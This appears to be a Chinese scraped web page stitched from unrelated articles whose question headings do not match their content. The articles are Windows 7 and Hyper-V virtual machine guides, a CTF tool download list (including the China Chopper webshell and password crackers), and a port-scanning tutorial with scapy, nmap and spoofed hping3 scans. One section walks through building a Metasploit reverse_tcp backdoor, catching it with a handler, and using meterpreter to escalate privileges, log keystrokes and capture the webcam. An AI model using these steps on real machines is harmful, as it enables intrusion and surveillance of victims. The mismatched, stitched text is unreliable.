求助下带np盾的游戏多开的方法
熟悉Windows7的朋友都知道一项新功能——虚拟XP模式,该模式用以解决Windows7一些兼容性问题。该功能借助Windows7自带的虚拟机工具——Windows Virtual PC,注意,并非Microsoft VirtualPC 2007!其实Windows Virtual PC不仅用以安装XP,还可安装Windows7。
第1步、在“虚拟机”窗口中单击工具栏的“创建虚拟机”命令;
第2步、弹出“创建虚拟机”对话框,指定此虚拟机的名称和位置,定制所需的内存和网络环境选项;
第3步、进入“指定内存和网络选项”对话框,推荐设置大于512MB的内存,另外选中“使用计算机网络连接”复选框,添加虚拟盘名称和对应的位置,选择保存分区;
第4步、进入“添加虚拟硬盘”对话框,默认选中“创建动态扩充虚拟硬盘”单选按钮,输入名称和位置后,单击“创建”按钮,将虚拟机选项保存到对应文件夹目录当中;
第5步、一个名为Win7的虚拟机创建完毕,在正式安装前需要对该虚拟机进行简单设置,单击工具栏的“设置”按钮,通过设置按钮,可导入操作系统的ISO映像;
第6步、弹出设置对话框,切换到“DVD驱动器”设置项,由于我下载的是Windows7RTM旗舰中文版镜像,所以选中“打开ISO映像”单选按钮,并选择下载的镜像文件,开始在虚拟机中,安装Windows 7操作系统;
第7步、设置完毕,启动刚刚创建的Win7虚拟机,首先开始读取镜像中的文件。
第8步、已经开始正式安装Windows7了,安装后可以在虚拟机中进行一些软件兼容性测试等等,非常方便。
以上就是在WIN7系统下安装WIN7的方法,第一次做可能会有些麻烦,等做一次就非常简单了。
求助关于使用自定义后门或者metasploit设置payload时的IP设置问题
很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。
设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。
方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。
sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x steup.exe
方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。
进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。
打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。
方法步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。
Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。
另外,附meterpreter常用命令:
getsystem #会自动利用各种各样的系统漏洞来进行权限提升
migrate #进程id进程迁移
background #把当前的会话设置为背景,需要的时候在启用
getuid #查看对方正在运行的用户
ps #列出所有的进程
getpid #返回运行meterpreter的id号
sysinfo #产看系统信息和体系结构
shell #切换到cmd的系统权限方式
exit #退出shell会话返回meterpreter或终止meterpreter
getdesktop 截取目标主机当前桌面会话窗口
run webcam -p /var/www #在/var/www目录监控目标主机的摄像头
keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
电脑怎么使用虚拟机
虚拟机是计算机中一些人会经常用到的功能,对于虚拟机软件,大家比较熟知的就是VMware公司推出的虚拟机软件。但是在Windows 8以及以后的Windows版本中,我们无须再安装虚拟机软件就可以轻松地使用虚拟机了,Windows系统中已经整合了一款很好用的虚拟机工具HYPER-V。下面我们就详细介绍一下在Windows 8中如何使用虚拟机。
1.安装Hyper-V
在我们安装Windows 8系统时,并没有默认安装Hyper-V组件,需要用户手动安装。
在系统的“控制面板”中打开“程序与功能窗口”,在窗口中选择“启用或关闭Windows功能”,打开“Windows功能”后,系统会列出Windows的所有安装组件,在这里我们只需要勾选“Hyper-V”选项,系统将会自动为用户安装Hyper-V软件。
2.创建虚拟 交换机
虚拟机想要上网是通过虚拟交换机来完成的,创建虚拟交换机使得虚拟机和现实主机构成一个局域网络,使得虚拟机通过虚拟交换机共享上网。
启动“Hyper-V管理器”,在左侧列表中选择“虚拟机交换机管理”命令,在左侧边栏中选择“新建虚拟网络交换机”命令,在列表中选择“外部”,并点击“穿件虚拟交换机”选项。
在打开的“创建网络虚拟交换机”界面中,填写交换机名称、说明等信息,在“连接类型”中选择“外部网络”,并在网络列表中选择现实中电脑上网所使用的网卡。
创建成功后,一个名为“vEthernet”的连接选项将会出现在系统的网络连接中,右击打开属性对话框,输入刚刚选择网卡的IP地址、子网掩码、DNS服务器和网关等信息,需要注意的是,子网掩码、DNS服务器和网关要和现实主机相同,IP地址要和现实主机在同一IP段。
3.创建虚拟系统
启动“Hyper-V管理器”,在右侧选择“新建-虚拟机”。
按照弹出的向导“指定位置和名称”-“分配内存”“配置网络”“安装操作系统”一步一步配置虚拟机。
需要注意的是,因为创建的虚拟机虽然只是在实体主机中独立出一块区域来当作一台虚拟计算机使用,但它也需要安装相应的操作系统,可以选择从光盘或者U盘来安装不同版本的操作系统。
经常用到虚拟机的网友应该对VMware软件比较熟悉,而对于Windows 8系统中自带的Hyper-V管理器比较陌生,很多具体细致的功能留给热心网友以后探寻。Hyper-V作为一款操作系统自带的软件,避免了繁琐的安装过程,是一款比较简单实用的虚拟机管理工具。
如何创建vmware windows 2008r2 虚拟机
在Windows环境下,通常有多种方式来部署、管理和配置基于Hyper-V的虚拟机,无论是在本地还是远程方式运行,你都可以使用Hyper-V管理控制台,或者你也可以使用Windows PowerShell cmdlet,此外,当Hyper-V服务器处于Windows故障集群中,你可以直接对故障群集进行管理,最后,你也可以直接使用System Center虚拟机管理工具(SCVMM)2008 R2.
Hyper-V管理控制台Hyper-V管理控制台通过默认的方式来管理非聚集的Hyper-V节点,并可以集成到服务器管理器控制台或单机运行中.
借助于Hyper-V控制台,你可以管理一个虚拟机的方方面面,可以添加或删除虚拟机,添加网络,更改虚拟机的配置,导出快照等等,以下将演示在Windows Server 2008 R2创建和管理虚拟机的关键步骤。
当你在运行Windows Server 2008
R2的环境中添加一个新的Hyper-V角色时,添加Hyper-V角色向导包括基本的网络设置,关键的要求是预留一个完全的网络接口卡(NIC)专门用
于服务器管理,如果还使用iSCSI端口来支持故障转移,你应该准备一个额外的NIC用于iSCSI通信。此外,在实际应用环境中,你也应该为服务器上的
每个虚拟机至少准备一个NIC,虚拟化的实施也需要服务器具备更多的NIC。
创建一个新的虚拟机
当要创建一个新的虚拟机时,右键单击在树窗格中的Hyper-V管理服务器,选择新建-虚拟机,新的建虚拟机向导可以创建一个“典型”的虚拟机,但在实际应用环境中,这个功能并不默认的,如果你使用向导来自动地创建一个新的虚拟硬盘(VHD),它将
会生成一个动态扩展的VHD文件,但是这也会带来性能上的损失,因为需要定期扩大磁盘空间,更好的选择是使用新的虚拟硬盘向导,如图4,在创建VM之前创
建VHD文件,它允许你指定合适的空间或者通过通道来获得最佳磁盘性能。
需要注意的是,使用自动新建虚拟机向导时,它会自动指定唯一一个处理器和一个单一的磁盘虚拟机,因此我们希望你根据自己的需要来创建VM,同时你要求极高的扩展性时,SCVMM是一个不错的解决方案。
配置虚拟机
一旦通过新建虚拟机向导创建虚拟机后,你将会经常调整修改虚拟机设置,右键单击在中心窗格中的Hyper-V管理器,并从下拉菜单中选择“设置”打开设置对话框。
你可以更改虚拟机使用的硬件,同时对虚拟机进行管理设置。当VM运行时,只有限被占用的硬件能进行设置和管理,包括改变一个网络适配器连接,改变DVD或软盘驱动器连接,添加或删除硬盘,Windows Server 2008 R2允许你动态地管理由虚拟机使用的存储。
CTF干货分享系列——工具资源
这里就是我很喜欢的部分了哈哈。
但是气不气,就是没时间写。继续挖大坑。
以后会放出工具和资源,作为整合帖。也会另开文单独介绍。
Burp Suite是用于攻击Web应用程序的集成平台。它包含了很多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息、持久性、认证、代理、日志、警报的一个强大的可扩展的框架。
Burp Suite Pro ,提取密码:0554
资源 密码:l4he
具体教程另开贴。
中国菜刀
链接
资源 密码:pp61
SQL注入,扫描等
链接
资源 密码:skb4
SQL注入工具
一款好用免费的内核查看器
链接
破解色道隐写,需要JAVA环境
运行于Windows的常用音频隐写工具
链接
开源隐写工具,C语言编写
知名逆向工具。
链接
资源 密码:tku8
目录扫描
链接
资源 密码:h4d6
漏洞扫描、目录扫描,Java语言编写
链接
资源 密码:mn9h
强大的WEB漏洞扫描工具
链接
资源 密码:e8tf
对zip暴力破解速度极快,支持明文攻击。
链接
资源 密码:4fhk
常用RAR爆破工具。
链接
资源 密码:ntw5
常用zip爆破工具,界面美观,可爆破隐写压缩包。
链接
资源 密码:1ebq
体积小巧,功能强大。
资源 密码:alfu
开源Orcal密码爆破,附源码,DOS下运行。
资源 密码:l5bm
phpMyAdmin密码爆破。
资源 密码:f0so
密码爆破,DOS下运行。
链接
资源 密码:gz8y
虚拟光驱、ISO烧录到U盘或光盘,小巧免费无广告。
链接
资源 密码:v2em
用于Linux系统远程连接,小巧免费无广告。
资源 密码:j9u9
免费内网穿透。
链接
资源 密码:tghf
精灵表格总结的CTF工具合集。
资源 密码:wu31
资源 密码:s1ta
CTF Crack框架(集成栅栏、凯撒等),国内首个CTF Crack框架,Java编写,源码在Github
链接
资源 密码:y1jk
一款Windows平台下预配置的便携式开源渗透测试环境。
Pentest Box不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。它打包了所有的安全工具,并且可以再Windows系统中原生地运行,有效降低了对虚拟机或者双启动环境的需求。
这里选择的是集成了Metasploit的版本,安装时要关闭杀毒软件和防火墙,默认释放在C:/PentestBox/。
链接
资源 密码:4lxe
渗透测试之端口扫描
端口扫描:端口对应网络服务及应用端程序
服务端程序的漏洞通过端口攻入
发现开放的端口
更具体的攻击面
UDP端口扫描:
如果收到ICMP端口不可达,表示端口关闭
如果没有收到回包,则证明端口是开放的
和三层扫描IP刚好相反
Scapy端口开发扫描
命令:sr1(IP(dst="192.168.45.129")/UDP(dport=53),timeout=1,verbose=1)
nmap -sU 192.168.45.129
TCP扫描:基于连接的协议
三次握手:基于正常的三次握手发现目标是否在线
隐蔽扫描:发送不完整的数据包,不建立完整的连接,如ACK包,SYN包,不会在应用层访问,
僵尸扫描:不和目标系统产生交互,极为隐蔽
全连接扫描:建立完整的三次握手
所有的TCP扫描方式都是基于三次握手的变化来判断目标系统端口状态
隐蔽扫描:发送SYN数据包,如果收到对方发来的ACK数据包,证明其在线,不与其建立完整的三次握手连接,在应用层日志内不记录扫描行为,十分隐蔽,网络层审计会被发现迹象
僵尸扫描:是一种极其隐蔽的扫描方式,实施条件苛刻,对于扫描发起方和被扫描方之间,必须是需要实现地址伪造,必须是僵尸机(指的是闲置系统,并且系统使用递增的IPID)早期的win xp,win 2000都是递增的IPID,如今的LINUX,WINDOWS都是随机产生的IPID
1,扫描者向僵尸机发送SYN+ACY,僵尸机判断未进行三次握手,所以返回RST包,在RST数据包内有一个IPID,值记为X,那么扫描者就会知道被扫描者的IPID
2,扫描者向目标服务器发送SYN数据包,并且伪装源地址为僵尸机,如果目标服务器端口开放,那么就会向僵尸机发送SYN+ACK数据包,那么僵尸机也会发送RST数据包,那么其IPID就是X+1(因为僵尸机足够空闲,这个就为其收到的第二个数据包)
3,扫描者再向僵尸机发送SYN+ACK,那么僵尸机再次发送RST数据包,IPID为X+2,如果扫描者收到僵尸机的IPID为X+2,那么就可以判断目标服务器端口开放
使用scapy发送数据包:首先开启三台虚拟机,
kali虚拟机:192.168.45.128
Linux虚拟机:192.168.45.129
windows虚拟机:192.168.45.132
发送SYN数据包:
通过抓包可以查看kali给linux发送syn数据包
linux虚拟机返回Kali虚拟机SYN+ACK数据包
kali系统并不知道使用者发送了SYN包,而其莫名其妙收到了SYN+ACK数据包,便会发RST包断开连接
也可以使用下列该命令查看收到的数据包的信息,收到对方相应的SYN+ACK数据包,scapy默认从本机的80端口往目标系统的20号端口发送,当然也可以修改
如果向目标系统发送一个 随机端口:
通过抓包的获得:1,kali向linux发送SYN数据包,目标端口23456,
2,Linux系统由自己的23456端口向kali系统的20号端口返回RST+ACK数据包,表示系统端口未开放会话结束
使用python脚本去进行scapy扫描
nmap做隐蔽端口扫描:
nmap -sS 192.168.45.129 -p 80,21,110,443 #扫描固定的端口
nmap -sS 192.168.45.129 -p 1-65535 --open #扫描该IP地址下1-65535端口扫描,并只显示开放的端口
nmap -sS 192.168.45.129 -p --open #参数--open表示只显示开放的端口
nmap -sS -iL iplist.txt -p 80
由抓包可知,nmap默认使用-sS扫描,发送SYN数据包,即nmap=nmap -sS
hping3做隐蔽端口扫描:
hping3 192.168.45.129 --scan 80 -S #参数--scan后面接单个端口或者多个端口.-S表示进行SYN扫描
hping3 192.168.45.129 --scan 80,21,25,443 -S
hping3 192.168.45.129 --scan 1-65535 -S
由抓包可得:
hping3 -c 100 -S --spoof 192.168.45.200 -p ++1 192.168.45.129
参数-c表示发送数据包的数量
参数-S表示发送SYN数据包
--spoof:伪造源地址,后面接伪造的地址,
参数-p表示扫描的端口,++1表示每次端口号加1,那么就是发送SYN从端口1到端口100
最后面跟的是目标IP
通过抓包可以得知地址已伪造,但对于linux系统(192.168.45.129)来说,它收到了192.168.45.200的SYN数据包,那么就会给192.168.45.200回复SYN+ACK数据包,但该地址却是kali伪造的地址,那么要查看目标系统哪些端口开放,必须登陆地址为kali伪造的地址即(192.168.45.200)进行抓包
hping3和nmap扫描端口的区别:1,hping3结果清晰明了
2,nmap首先对IP进行DNS反向解析,如果没成功,那么便会对其端口发送数据包,默认发送SYN数据包
hping3直接向目标系统的端口发送SYN数据包,并不进行DNS反向解析
全连接端口扫描:如果单独发送SYN数据包被被过滤,那么就使用全连接端口扫描,与目标建立三次握手连接,结果是最准确的,但容易被入侵检测系统发现
response=sr1(IP(dst="192.168.45.129")/TCP(dport=80,flags="S"))
reply=sr1(IP(dst="192.168.45.129")/TCP(dport=80,flags="A",ack=(response[TCP].seq+1)))
抓包情况:首先kali向Linux发送SYN,Linux回复SYN+ACK给kali,但kali的系统内核不清楚kali曾给linux发送给SYN数据包,那么kali内核莫名其妙收到SYN+ACK包,那么便会返回RST请求断开数据包给Linux,三次握手中断,如今kali再给Linux发ACK确认数据包,Linux莫名其妙收到了ACK数据包,当然也会返回RST请求断开数据包,具体抓包如下:
那么只要kali内核在收到SYN+ACK数据包之后,不发RST数据包,那么就可以建立完整的TCP三次握手,判断目标主机端口是否开放
因为iptables存在于Linux内核中,通过iptables禁用内核发送RST数据包,那么就可以实现
使用nmap进行全连接端口扫描:(如果不指定端口,那么nmap默认会扫描1000个常用的端口,并不是1-1000号端口)
使用dmitry进行全连接端口扫描:
dmitry:功能简单,但功能简便
默认扫描150个最常用的端口
dmitry -p 192.168.45.129 #参数-p表示执行TCP端口扫描
dmitry -p 192.168.45.129 -o output #参数-o表示把结果保存到一个文本文档中去
使用nc进行全连接端口扫描:
nc -nv -w 1 -z 192.168.45.129 1-100: 1-100表示扫描1-100号端口
参数-n表示不对Ip地址进行域名解析,只把其当IP来处理
参数-v表示显示详细信息
参数-w表示超时时间
-z表示打开用于扫描的模式